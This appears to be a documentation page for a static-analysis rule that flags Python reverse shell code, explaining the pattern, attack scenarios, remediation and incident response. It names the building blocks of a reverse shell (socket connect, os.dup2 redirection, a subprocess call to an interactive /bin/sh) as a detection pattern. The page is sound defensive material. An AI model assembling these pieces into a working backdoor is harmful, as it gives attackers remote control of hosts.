Rule Information
Tags
pythonreverse-shellbackdoormalicious-codesocketCWE-506OWASP-A03
CWE References
Interactive Playground
Experiment with the vulnerable code and security rule below. Edit the code to see how the rule detects different vulnerability patterns.
pathfinder scan --ruleset python/PYTHON-LANG-SEC-014 --project .1
2
3
4
rule.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
About This Rule
Understanding the vulnerability and how it is detected
A reverse shell is a type of backdoor in which the compromised host initiates an outbound network connection to an attacker-controlled server and then redirects its stdin, stdout, and stderr over that connection, giving the attacker an interactive shell session on the host.
Common Python reverse shell patterns include creating a socket connection to a remote IP and port, then either passing the socket file descriptor to subprocess (subprocess.call(["/bin/sh", "-i"]), or duplicating the file descriptor over stdin/stdout/stderr using os.dup2(), or executing the socket through exec()/eval() with __builtins__ access.
Finding this pattern in production code is a critical security incident indicator. It may represent active compromise of the codebase, a supply chain attack through a dependency, a malicious insider contribution, or a legitimate security testing tool that was accidentally included in production code.
Security Implications
Potential attack scenarios if this vulnerability is exploited
1
Complete Host Compromise
A reverse shell gives the attacker an interactive command line on the host with the privileges of the Python process. All data, credentials, certificates, and capabilities of the process are immediately accessible to the attacker.
2
Persistent Access
Unlike a one-shot command injection, a reverse shell provides an ongoing interactive session. The attacker can install additional backdoors, lateral movement tools, and persistence mechanisms during the session.
3
Firewall Bypass via Outbound Connection
Reverse shells initiate outbound connections from the compromised host to the attacker. Most network perimeters allow outbound connections, so this technique bypasses inbound firewall rules that would block a traditional bind shell.
4
Supply Chain Compromise Indicator
Reverse shell code found in a third-party dependency or unexpected location in the codebase may indicate a supply chain attack. This requires forensic analysis to determine when and how the code was introduced and which systems may have executed it.
How to Fix
Recommended remediation steps
- 1Immediately quarantine and investigate any codebase containing a reverse shell pattern; treat it as an active security incident.
- 2Audit git history and dependency lockfiles to determine when the reverse shell code was introduced and trace the source.
- 3Scan all deployed instances for active outbound connections to unexpected IP addresses and ports.
- 4Implement code review policies that flag any use of socket combined with subprocess or os.dup2() for review by the security team.
- 5Use software composition analysis (SCA) tools to scan third-party dependencies for malicious code patterns before installation.
Detection Scope
How Code Pathfinder analyzes your code for this vulnerability
This rule detects patterns combining socket module calls (socket.socket, socket.connect) with process execution (subprocess.call, os.dup2, exec) that match known Python reverse shell templates. The pattern is highly specific to malicious code and has very few legitimate uses in production application code.
Compliance & Standards
Industry frameworks and regulations that require detection of this vulnerability
CWE Top 25
CWE-506 - Embedded Malicious Code
OWASP Top 10
A03:2021 - Injection
NIST SP 800-53
SI-3: Malicious Code Protection
PCI DSS v4.0
Requirement 5.2 - Protect all system components from malware
References
External resources and documentation
Similar Rules
Explore related security rules for Python
HIGH
Dangerous os.system() or os.popen() Call
os.system() and os.popen() execute shell commands via /bin/sh, enabling command injection when arguments contain untrusted input.
HIGH
Dangerous subprocess Usage
subprocess calls detected. Ensure command arguments are not user-controlled to prevent OS command injection.
MEDIUM
Socket Bound to All Interfaces (0.0.0.0)
Binding a socket to 0.0.0.0 exposes the service on all network interfaces, including public-facing ones. Bind to specific interfaces in production.
Frequently Asked Questions
Common questions about Python Reverse Shell Pattern Detected
Almost never. Reverse shell patterns combining socket connections with stdin/stdout
redirection to a subprocess have no legitimate use in production web services, APIs,
data processing pipelines, or any normal application. If found in production code,
treat it as a security incident until proven otherwise through forensic analysis.
Legitimate network libraries do not combine socket file descriptor duplication with
subprocess stdin/stdout redirection. The specific combination of socket.connect(),
os.dup2(), and subprocess/exec that characterizes a reverse shell is not present in
well-known libraries. Investigate any flagged code regardless of its apparent context.
First, do not dismiss or suppress the finding. Quarantine the affected codebase,
notify your security incident response team, audit git history for unauthorized commits,
check running processes for active outbound connections, and rotate all credentials
the compromised process had access to. Treat it as a potential breach until investigation
concludes otherwise.
Common paths include: malicious commits from compromised developer accounts, supply
chain attacks through third-party packages (typosquatting, dependency confusion,
compromised maintainer accounts), malicious pull requests that slipped through code
review, and attackers who achieved code execution and wrote a persistence mechanism.
Preserve logs and process state before taking remediation actions. Check outbound
network connections for the time period since the code was deployed. Review git blame
and commit signatures. Check package integrity hashes against known-good versions.
Rotate all secrets that were accessible to the compromised process.
Security research and penetration testing code may contain reverse shell implementations,
but this code should never be in the same repository as production application code.
Maintain strict separation between security tooling and application code, and ensure
security tools are never deployed to production environments.
New feature
Get these findings posted directly on your GitHub pull requests
The Python Reverse Shell Pattern Detected rule runs in CI and posts inline review comments on the exact lines — no dashboard, no SARIF viewer.